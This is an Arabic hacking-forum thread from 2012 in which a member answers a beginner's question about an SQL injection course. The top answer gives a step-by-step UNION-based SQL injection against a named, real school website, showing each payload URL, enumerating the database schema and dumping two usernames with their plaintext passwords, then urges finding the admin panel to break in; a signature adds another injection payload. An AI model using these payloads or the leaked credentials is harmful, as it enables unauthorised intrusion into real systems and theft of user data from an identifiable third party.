التواصل المباشر مع الادارة والاعضاء القدامى من خلال قناة التلغرام



العودة   :: vBspiders Professional Network :: > [ ::. خدماتنـــــا .:: ] > جـــ'ابات العناكــ'ب
تحديث الصفحة سؤال بسيط فى دورة sql
التعليمات التقويم البحث مشاركات اليوم

إضافة رد
 
LinkBack أدوات الموضوع انواع عرض الموضوع
قديم 06-25-2012, 08:24 PM   رقم المشاركة : 1 (permalink)
معلومات العضو
 
الصورة الرمزية TIKTAKram
 

 
 
إحصائية العضو







TIKTAKram غير متواجد حالياً

إرسال رسالة عبر MSN إلى TIKTAKram إرسال رسالة عبر Yahoo إلى TIKTAKram إرسال رسالة عبر Skype إلى TIKTAKram

 

 

إحصائية الترشيح

عدد النقاط : 10
TIKTAKram is on a distinguished road
افتراضي مجاب: رد: سؤال بسيط فى دورة sql

السلام عليكم و رحمة الله و بركاته

بصراحة بما أنك قد وصلت لتلك المرحلة من الحقنة يعني أنك فهمت مبدأ الحقن، بالتوفيق

راح أحاول أشرح لك قدر ما تفهم فقط !!!

شوف أخي، لو تلاحظ أنك في الحقنة كنت تبحث عن عمود إسمه يشابه أو يقارب كلمة pass

و ذلك من خلال الإستعلام التالي : where+column_name+like+%pas%

و إن وجده، راح يظهر لك إسم الجدول لي موجود عليه العمود و إسم العمود و إسم جدول السجما

و ذلك من خلال إستعلامك لي واضعه أنت شوف : concat(table_name,0x3a,column_name,0x3a,table_sche ma)

و لكن لا تخاف إستغلالك صحيح، فلماذا نتج لك الخطأ ؟

أنا راح أجيبك، لانو عند وضعك للإستعلام لم يوجد أي عمود يشبه كلمة %pas% و هذا لا يعني أنك خاطئ

نصيحة مني أن لا تعتمد على مثل هذه المواقع

و الحقنة قد تستطيع إكمالها و لكن بدون فائدة و السبب أنه لا يوجد عمود خاص بالباسوارد

و مثل هذه المواقع تجدها لا تعتمد على تسجيل الأعضاء في قاعدة البيانات، كما تجدها لا تعتمد على إدارة الموقع من خلال لوحة التحكم و إنما المدير يدير موقعه إما مباشرة من السيبنل أو من الأف تي بي أو من سيرفره الشخصي على ما أعتقد

أتمنى تكون فهمت الفكرة و لو قليلا

نصيحة أخيرة : في الحقن تأكد أن موقع واحد للتعلم لا يكفي، حاول إيجاد مواقع كثيرة و لا تعتمد على ما يأتي في الدورات فقط، لأن في الدورات يفهمك الأساس، و على ذلك الأساس يجب أن تكمل وحدك لتفهم الباقي

بالتوفيق إن شاء الله !!!



Vspan style="font-weight: bold; color: #006400;"Cl[hf:VLspanC v]: schg fsd' tn ],vm sql

التوقيع

تم تغيير الإسم من Syst3m-32 إلى G3nius-Syst3m






ID=-1/**/UNION/**/SELECT 1,2,3,
concat(G3nius-Syst3m,0x3a,PASS),5,6+FROM+VbSpiders.Users--

 

   

رد مع اقتباس
أفضل جواب - كتبه TIKTAKram
أخي الكريم، للأسف يظهر أنك لا زلت مبتدأ في الـSQL مازال الوقت طويل أمامك

راح تكون هذه آخر مساعدة أقدر أعملهالك

و راح أشرح لك حقن هذا الموقع خطوة خطوة بدون أي صعوبة

لنبدأ على بركة الله :

الموقع مصاب و الدليل لما نضع الـ(') شوف :
['CODE]http://szerver2.berzeviczy.sulinet.hu/submenu.php?id=1
[/CODE]

الآن راح نشوف عدد الأعمدة عن طريق الأمر order by و راح نجد العمود المصاب هو 1 و العمود يظهر يسار الصفحة كأنه عنوان و هذه هي الحقنة لحد الآن :
كود:
http://szerver2.berzeviczy.sulinet.hu/submenu.php?id=-1 UNION SELECT 1,2,3,4,5,6,7,8--
الآن نشوف إصدار قاعدة البيانات من خلال العمود 1 و راح نجد أن الإصدار هو الإصدار رقم 5

نطبق الحقنة التالية مباشرة، لاحظ جيدا :
كود:
http://szerver2.berzeviczy.sulinet.hu/submenu.php?id=-1 UNION SELECT concat(table_name,0x3a,column_name,0x3a,table_schema),2,3,4,5,6,7,8+from+information_schema.columns--
لحد الآن ماشاء الله الحقنة تعمل، الآن نروح نبحث عن العمود يلي إسمه يشبه %pas% و نكون وصلنا لهذه الحقنة :
كود:
http://szerver2.berzeviczy.sulinet.hu/submenu.php?id=-1 UNION SELECT concat(table_name,0x3a,column_name,0x3a,table_schema),2,3,4,5,6,7,8+from+information_schema.columns+where+column_name+like+CHAR(37, 112, 97, 115, 37)--
ما شاء الله، و الحمد لله، ظهر العمود و كل شيء الخاص بالعمود لي يشبه %pas%

الآن نروح لسورس الصفحة و نشوف راح نجد المعلومات التالية :
users:passwd:berze_web

يعني أن إسم الجدول هو users و إسم العمود هو passwd

الآن نكمل الحقنة و راح تصير هكذا :
كود:
http://szerver2.berzeviczy.sulinet.hu/submenu.php?id=-1 UNION SELECT concat(table_name,0x3a,column_name,0x3a,table_schema),2,3,4,5,6,7,8+from+information_schema.columns+where+table_name=0x7573657273--
ما شاء الله، و الحمد لله، ظهرت لنا جميع الأعمدة الموجودة في الجدول users و هي :
login_name و passwd

و الآن نكمل حقنتنا عادي جدا، و نستخرج الباسوارد و اليوزر من خلال تكملة الحقنة لاحظ :
كود:
http://szerver2.berzeviczy.sulinet.hu/submenu.php?id=-1 UNION SELECT concat(login_name,0x3a,passwd),2,3,4,5,6,7,8+from+users--
ما شاء الله، و الحمد لله، إنتهينا و إستخرجنا معلومات الموقع و مدير الموقع وهذه هي :
user1 = rlaci
pass1= chipchip

user2= www
pass2= HEkbY3U6

الآن يبقى عليك تبحث عن مسار لوحة التحكم و تخترق الموقع و مبروك عليك

للأسف بحثت على اللوحة بسرعة لكن لم أجدها سامحني ليس لي الوقت لأقوم بفحص ملفات الموقع

هذا كل لي أقدر أساعدك فيه، و الله كتبت حتى التعب ههههه لكن مو غالي عنك

بالتوفيق إن شاء الله

تحيتي ...
قديم 06-25-2012, 08:38 PM   رقم المشاركة : 2 (permalink)
معلومات العضو
Mezo Shams
:: حبيبي يا رسول الله ::
 
الصورة الرمزية Mezo Shams
 

 
 
إحصائية العضو






Mezo Shams غير متواجد حالياً

إرسال رسالة عبر MSN إلى Mezo Shams إرسال رسالة عبر Yahoo إلى Mezo Shams

 

 

إحصائية الترشيح

عدد النقاط : 10
Mezo Shams is on a distinguished road
افتراضي رد: سؤال بسيط فى دورة sql

طب بوص يا اخى انا كدة ماشى مظبوط والحمد لله عايز مواقع سهلة كتير اجرب اجيب عليها
العمود المصاب واجرب عليها دية لانى دورت ملاتشى

   

رد مع اقتباس
إضافة رد

مواقع النشر (المفضلة)

« الموضوع السابق | الموضوع التالي »
أدوات الموضوع
انواع عرض الموضوع
العرض المتطور العرض المتطور

تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك
BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة
الانتقال السريع


الساعة الآن 11:39 PM

:: vBspiders.Com :: RSS Feeds - راسلـنا - :: vBspiders.Com :: - الأعلى

[ vBspiders.Com Network ]

SEO by vBSEO 3.6.0